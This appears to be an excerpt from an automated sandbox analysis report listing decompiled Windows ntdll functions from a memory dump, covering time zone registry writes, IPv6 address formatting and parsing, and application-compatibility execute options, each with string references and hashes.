0x02178a91
0x02178a93
0x02178a93
0x02178a98
0x02178a9b
0x02178aa1
0x02178aa1
0x02178aa4
0x02178aaa
0x02178ab1
0x02178ac5
0x02178ac7
0x02178ac7
0x02178ac5
0x02178ace
0x021c1bc9
0x021c1bce
0x021c1bd2
0x021c1bd2
0x02178ad8
0x02178aeb
0x02178aeb
0x02178af0
0x02178af4
0x00000000
0x02178af4
0x02178a42
0x02178926
0x02178929
0x0217892c
0x0217892d
0x02178930
0x02178935
0x0217893a
0x02178b51
0x02178940
0x02178954
0x02178954
0x0217895a
0x021c1b63
0x00000000
0x02178960
0x02178969
0x02178973
0x02178976
0x02178979
0x0217897e
0x02178981
0x02178981
0x02178986
0x00000000
0x00000000
0x021c1b6e
0x021c1b74
0x021c1b7b
0x021c1b8f
0x021c1b91
0x021c1b91
0x021c1b99
0x021c1b9c
0x021c1ba2
0x021c1ba2
0x0217898c
0x02178992
0x02178999
0x021789ad
0x021c1ba8
0x021c1ba8
0x021789ad
0x021789b6
0x021789c8
0x021789cd
0x021789d0
0x021789d0
0x021789d6
0x021789e8
0x021789e8
0x021789ed
0x00000000
0x021789ed
0x0217895a
0x0217883e
0x02178841
0x02178844
0x02178845
0x02178848
0x0217884d
0x02178852
0x02178b49
0x02178858
0x0217886c
0x0217886c
0x02178872
0x021c1b0e
0x00000000
0x02178878
0x02178881
0x0217888b
0x0217888e
0x02178891
0x02178896
0x02178899
0x02178899
0x0217889e
0x00000000
0x00000000
0x021c1b21
0x021c1b27
0x021c1b2e
0x021c1b42
0x021c1b44
0x021c1b44
0x021c1b4c
0x021c1b4f
0x021c1b55
0x021c1b55
0x021788a4
0x021788aa
0x021788b1
0x021788c5
0x021c1b5b
0x021c1b5b
0x021788c5
0x021788ce
0x021788e0
0x021788e5
0x021788e8
0x021788e8
0x021788ee
0x02178900
0x02178900
0x02178905
0x00000000
0x02178905

APIs

_wcspbrk.LIBCMT ref: 02178891
_wcspbrk.LIBCMT ref: 02178979
_wcspbrk.LIBCMT ref: 02178A61
_wcspbrk.LIBCMT ref: 02178A9B
_wcspbrk.LIBCMT ref: 021C1B9C

Strings

Kernel-MUI-Language-SKU, xrefs: 021789FC
Kernel-MUI-Language-Disallowed, xrefs: 02178914
Kernel-MUI-Language-Allowed, xrefs: 02178827
Kernel-MUI-Number-Allowed, xrefs: 021787E6
WindowsExcludedProcs, xrefs: 021787C1

Memory Dump Source

Source File: 00000007.00000002.2353209485.0000000002140000.00000040.00000001.sdmp, Offset: 02130000, based on PE: true

Associated: 00000007.00000002.2353204810.0000000002130000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353300121.0000000002220000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353304963.0000000002230000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353309981.0000000002234000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353314392.0000000002237000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353318475.0000000002240000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353349741.00000000022A0000.00000040.00000001.sdmp Download File

Similarity

API ID: _wcspbrk
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 402402107-258546922
Opcode ID: 6a93da26f0b8be4799bd58006fc12189b2e9a00ee4476b132932b1dfbaa33f5e
Instruction ID: 29f4a05d74701afab47a36da01edbfa167bb9d50f27ccacb994c3fddbcb0db39
Opcode Fuzzy Hash: 6a93da26f0b8be4799bd58006fc12189b2e9a00ee4476b132932b1dfbaa33f5e
Instruction Fuzzy Hash: 57F105B6D80219EFCF11DF94C984AEEB7BAFF48304F1144AAE915A7210E7349A45DF60

Uniqueness

Uniqueness Score: -1.00%

Function 021E822C, Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 160
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E021E822C(void* __ecx, void* __edx, signed int _a4, signed int _a8) {
				char _v8;
				void* __ebx;
				signed int _t41;
				void* _t42;
				signed int* _t50;
				void* _t71;
				void* _t73;
				void* _t78;
				signed int _t81;
				void* _t84;

				_push(__ecx);
				_t81 = _a4;
				_t84 = 0x20;
				_t71 = E02205A34(_t81 + 4, _t84);
				if(_t71 < _t84) {
					_t41 = E02205A34(_t81 + 0x58, _t84);
					_pop(_t78);
					_a4 = _t41;
					__eflags = _t41 - _t84;
					if(_t41 >= _t84) {
						goto L1;
					} else {
						_t42 = E021A7DCD(1,  &_v8);
						__eflags = _t42;
						if(__eflags >= 0) {
							__eflags = E021E810D(_t71, _t78, __eflags, 0x40000000, _v8, L"Bias", 4, _t81, 4);
							if(__eflags < 0) {
								L14:
								_a4 = 0;
								_t73 = E021E810D(_t71, _t78, __eflags, 0x40000000, _v8, L"TimeZoneKeyName", 1,  &_a4, 2);
								__eflags = _t73;
								if(__eflags >= 0) {
									_a8 =  *(_t81 + 0x1ac) & 0x000000ff;
									_t50 =  &_a8;
									goto L16;
								}
							} else {
								_t8 = _t71 + 2; // 0x2
								__eflags = E021E810D(_t71, _t78, __eflags, 0x40000000, _v8, L"StandardName", 1, _t81 + 4, _t71 + _t8);
								if(__eflags < 0) {
									goto L14;
								} else {
									_t71 = 4;
									__eflags = E021E810D(_t71, _t78, __eflags, 0x40000000, _v8, L"StandardBias", _t71, _t81 + 0x54, _t71);
									if(__eflags < 0) {
										goto L14;
									} else {
										__eflags = E021E810D(_t71, _t78, __eflags, 0x40000000, _v8, L"StandardStart", 3, _t81 + 0x44, 0x10);
										if(__eflags < 0) {
											goto L14;
										} else {
											__eflags = E021E810D(_t71, _t78, __eflags, 0x40000000, _v8, L"DaylightName", 1, _t81 + 0x58, _a4 + _a4 + 2);
											if(__eflags < 0) {
												goto L14;
											} else {
												__eflags = E021E810D(_t71, _t78, __eflags, 0x40000000, _v8, L"DaylightBias", _t71, _t81 + 0xa8, _t71);
												if(__eflags < 0) {
													goto L14;
												} else {
													__eflags = E021E810D(_t71, _t78, __eflags, 0x40000000, _v8, L"DaylightStart", 3, _t81 + 0x98, 0x10);
													if(__eflags < 0) {
														goto L14;
													} else {
														__eflags = _a8 - 0x1b0;
														if(__eflags < 0) {
															goto L14;
														} else {
															_t73 = E021E810D(_t71, _t78, __eflags, 0x40000000, _v8, L"TimeZoneKeyName", 1, _t81 + 0xac, 0x100);
															__eflags = _t73;
															if(__eflags >= 0) {
																_a4 =  *(_t81 + 0x1ac) & 0x000000ff;
																_t50 =  &_a4;
																L16:
																_t73 = E021E810D(_t73, _t78, __eflags, 0x40000000, _v8, L"DynamicDaylightTimeDisabled", 4, _t50, 4);
															}
														}
													}
												}
											}
										}
									}
								}
							}
							E0214F9F0(_v8);
							_t42 = _t73;
						}
					}
				} else {
					L1:
					_t42 = 0xc000000d;
				}
				return _t42;
			}

0x021e8231
0x021e8235
0x021e823a
0x021e8245
0x021e824b
0x021e825c
0x021e8262
0x021e8263
0x021e8266
0x021e8268
0x00000000
0x021e826a
0x021e8270
0x021e8275
0x021e8277
0x021e8295
0x021e8297
0x021e838d
0x021e8391
0x021e83a9
0x021e83ab
0x021e83ad
0x021e83b6
0x021e83b9
0x00000000
0x021e83b9
0x021e829d
0x021e829d
0x021e82b6
0x021e82b8
0x00000000
0x021e82be
0x021e82c0
0x021e82d5
0x021e82d7
0x00000000
0x021e82dd
0x021e82f3
0x021e82f5
0x00000000
0x021e82fb
0x021e8317
0x021e8319
0x00000000
0x021e831b
0x021e8332
0x021e8334
0x00000000
0x021e8336
0x021e834f
0x021e8351
0x00000000
0x021e8353
0x021e8353
0x021e835a
0x00000000
0x021e835c
0x021e8378
0x021e837a
0x021e837c
0x021e8385
0x021e8388
0x021e83bc
0x021e83cf
0x021e83cf
0x021e837c
0x021e835a
0x021e8351
0x021e8334
0x021e8319
0x021e82f5
0x021e82d7
0x021e82b8
0x021e83d4
0x021e83d9
0x021e83d9
0x021e8277
0x021e824d
0x021e824d
0x021e824d
0x021e824d
0x021e83df

APIs

_wcsnlen.LIBCMT ref: 021E8240
_wcsnlen.LIBCMT ref: 021E825C

Strings

DaylightName, xrefs: 021E8309
TimeZoneKeyName, xrefs: 021E836A, 021E839B
Bias, xrefs: 021E8282
StandardName, xrefs: 021E82A8
StandardBias, xrefs: 021E82C7
DaylightStart, xrefs: 021E8341
StandardStart, xrefs: 021E82E5
DynamicDaylightTimeDisabled, xrefs: 021E83C1
DaylightBias, xrefs: 021E8324

Memory Dump Source

Source File: 00000007.00000002.2353209485.0000000002140000.00000040.00000001.sdmp, Offset: 02130000, based on PE: true

Associated: 00000007.00000002.2353204810.0000000002130000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353300121.0000000002220000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353304963.0000000002230000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353309981.0000000002234000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353314392.0000000002237000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353318475.0000000002240000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353349741.00000000022A0000.00000040.00000001.sdmp Download File

Similarity

API ID: _wcsnlen
String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
API String ID: 3628947076-1387797911
Opcode ID: e2458c8d97dae968ee7c37772d64a003dcbbd27efbd2f5364dedbad5315c846b
Instruction ID: cfe1fe3e57ba4294e6eb70988cc4f60016fb951169f4ce251f48692919de6e84
Opcode Fuzzy Hash: e2458c8d97dae968ee7c37772d64a003dcbbd27efbd2f5364dedbad5315c846b
Instruction Fuzzy Hash: C3416176380B09BEFF029AA1CC81FDFB76DAF05758F114112BA06961E0D7B1DB518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 021913CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E021913CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E02187707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x2152926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E02187707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x2159cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E02187707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E02187707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E02187707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E02187707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}

0x021913d5
0x021913d9
0x021913dc
0x021913de
0x021913e1
0x021913e8
0x021913ee
0x021be8fd
0x00000000
0x021be921
0x021be921
0x021be928
0x021be982
0x021be98a
0x00000000
0x021be99a
0x021be99e
0x021be9a3
0x021be9a8
0x021be9b9
0x021be978
0x00000000
0x021be978
0x021be98a
0x021be92a
0x021be931
0x021be944
0x021be944
0x021be950
0x021be954
0x021be959
0x021be95e
0x021be963
0x021be970
0x00000000
0x021be975
0x021be93b
0x021be980
0x00000000
0x021be980
0x021be942
0x021be94b
0x00000000
0x021be94b
0x00000000
0x021be942
0x021913f4
0x021913f4
0x021913f9
0x021913fc
0x021913ff
0x02191406
0x021be9cc
0x021be9d2
0x021be9d2
0x021be9cc
0x0219140c
0x02191411
0x02191431
0x0219143a
0x0219143c
0x0219143f
0x0219143f
0x02191442
0x02191447
0x021914a8
0x021914ac
0x021be9e2
0x021be9e7
0x021be9ec
0x021bea05
0x021bea05
0x00000000
0x02191449
0x00000000
0x02191449
0x0219144c
0x02191459
0x02191462
0x02191469
0x0219146a
0x02191470
0x02191473
0x02191476
0x02191476
0x02191490
0x02191495
0x0219138e
0x02191390
0x02191397
0x02191398
0x02191399
0x021913a1
0x021913a4
0x021913a4
0x02191498
0x0219149c
0x0219149f
0x021914a2
0x00000000
0x00000000
0x021914a4
0x00000000
0x021914a4
0x02191413
0x02191415
0x02191416
0x02191419
0x0219141c
0x02191422
0x021913b7
0x021913bc
0x021913bf
0x021913bf
0x021913c2
0x02191424
0x02191424
0x02191424
0x02191427
0x0219142b
0x0219142c
0x0219142c
0x0219142c
0x00000000
0x0219141c
0x02191411

APIs

___swprintf_l.LIBCMT ref: 0219146B
___swprintf_l.LIBCMT ref: 02191490
___swprintf_l.LIBCMT ref: 021BE970

Strings

ffff:, xrefs: 021BE94B
:%u.%u.%u.%u, xrefs: 021BE9F4
::ffff:0:%u.%u.%u.%u, xrefs: 021BE9B0
::%hs%u.%u.%u.%u, xrefs: 021BE967

Memory Dump Source

Source File: 00000007.00000002.2353209485.0000000002140000.00000040.00000001.sdmp, Offset: 02130000, based on PE: true

Associated: 00000007.00000002.2353204810.0000000002130000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353300121.0000000002220000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353304963.0000000002230000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353309981.0000000002234000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353314392.0000000002237000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353318475.0000000002240000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353349741.00000000022A0000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 7ef558b412269a5124cc60ee59799a9ef700383fe50ea76ec944e0b593942c4a
Instruction ID: 8814c398c464afff3a76fae1eb5e0be82d821a41959b43f201011c36e786295b
Opcode Fuzzy Hash: 7ef558b412269a5124cc60ee59799a9ef700383fe50ea76ec944e0b593942c4a
Instruction Fuzzy Hash: B8612675D80656FADF25DF59C8808BFBBB5EF89300758C06DE8EA47640D334A680CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02187EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E02187EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x2232088; // 0x774cf084
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E02187F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E021A3F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E0215DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x2234218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E021A3F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E02160D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E021A3F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E02168375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E021A3F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E021CE8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E021A3F92();
					_t38 = 1;
					L2:
					return E0215E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}

0x02187f08
0x02187f0f
0x02187f12
0x02187f1b
0x02187f31
0x021a3ead
0x021a3eb4
0x00000000
0x00000000
0x021a3eba
0x021a3ecd
0x021a3ed2
0x021a3ee1
0x021a3ee7
0x021a3eec
0x021a3f12
0x021a3f18
0x021a3f1a
0x00000000
0x00000000
0x021a3f20
0x021a3f26
0x021a3f28
0x00000000
0x00000000
0x021a3f2e
0x021a3f30
0x00000000
0x00000000
0x021a3f3a
0x021a3f3b
0x021a3f53
0x021a3f64
0x021a3f69
0x021a3f6c
0x021a3f6d
0x021a3f6f
0x021ae304
0x021ae30f
0x021ae315
0x021ae31e
0x021ae321
0x021ae327
0x021ae329
0x00000000
0x00000000
0x00000000
0x00000000
0x021ae32f
0x021ae32f
0x021ae337
0x021ae33a
0x021ae33b
0x021ae33d
0x021ae33f
0x021ae341
0x021ae341
0x021ae34e
0x021ae353
0x021ae358
0x021ae35d
0x021ae35f
0x00000000
0x00000000
0x021ae365
0x021ae365
0x021ae368
0x021ae36e
0x00000000
0x00000000
0x021ae374
0x021ae32f
0x021a3f75
0x021a3f7a
0x021a3f7c
0x021a3f7e
0x021a3f86
0x02187f39
0x02187f47
0x02187f47
0x02187f37
0x02187f37
0x00000000

APIs

BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 021A3F12

Strings

CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 021AE2FB
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 021A3F4A
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 021A3EC4
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 021A3F75
CLIENT(ntdll): Processing section info %ws..., xrefs: 021AE345
Execute=1, xrefs: 021A3F5E
ExecuteOptions, xrefs: 021A3F04

Memory Dump Source

Source File: 00000007.00000002.2353209485.0000000002140000.00000040.00000001.sdmp, Offset: 02130000, based on PE: true

Associated: 00000007.00000002.2353204810.0000000002130000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353300121.0000000002220000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353304963.0000000002230000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353309981.0000000002234000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353314392.0000000002237000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353318475.0000000002240000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353349741.00000000022A0000.00000040.00000001.sdmp Download File

Similarity

API ID: BaseDataModuleQuery
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 3901378454-484625025
Opcode ID: 9f1f8ab099e5dc00cc99ad84698358d29413587638405ad9b5a1b75fb3cb37ba
Instruction ID: 26de12909dfb5b7713d6e94138833aaee3e794fe1cacf8b5a55ba2bc6490a39d
Opcode Fuzzy Hash: 9f1f8ab099e5dc00cc99ad84698358d29413587638405ad9b5a1b75fb3cb37ba
Instruction Fuzzy Hash: 3241DC366C021CBEEF20EA94DCD5FEAB3BDAF14704F1405E9E515E6180E7709A458F61

Uniqueness

Uniqueness Score: -1.00%

Function 02190B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02190B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E02168980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E0215DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E02190CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E02190CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E021906BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E021906BA(_t135, _t178) == 0 || E02190A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E02190CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E02190CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E021906BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E021906BA(_t124, _t142) == 0 || E02190A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

0x02190b21
0x02190b24
0x02190b27
0x02190b2a
0x02190b2d
0x02190b30
0x02190b33
0x02190b36
0x02190b39
0x02190b3e
0x02190c65
0x02190c68
0x02190c6a
0x02190c6f
0x021beb42
0x00000000
0x00000000
0x021beb48
0x021beb48
0x02190c75
0x02190c7a
0x021beb54
0x00000000
0x00000000
0x00000000
0x021beb5a
0x02190c80
0x02190c84
0x021beb98
0x00000000
0x00000000
0x021beba6
0x02190cb8
0x02190cba
0x02190cd3
0x02190cda
0x02190ce4
0x02190ce9
0x00000000
0x02190cec
0x02190c8c
0x021beb63
0x00000000
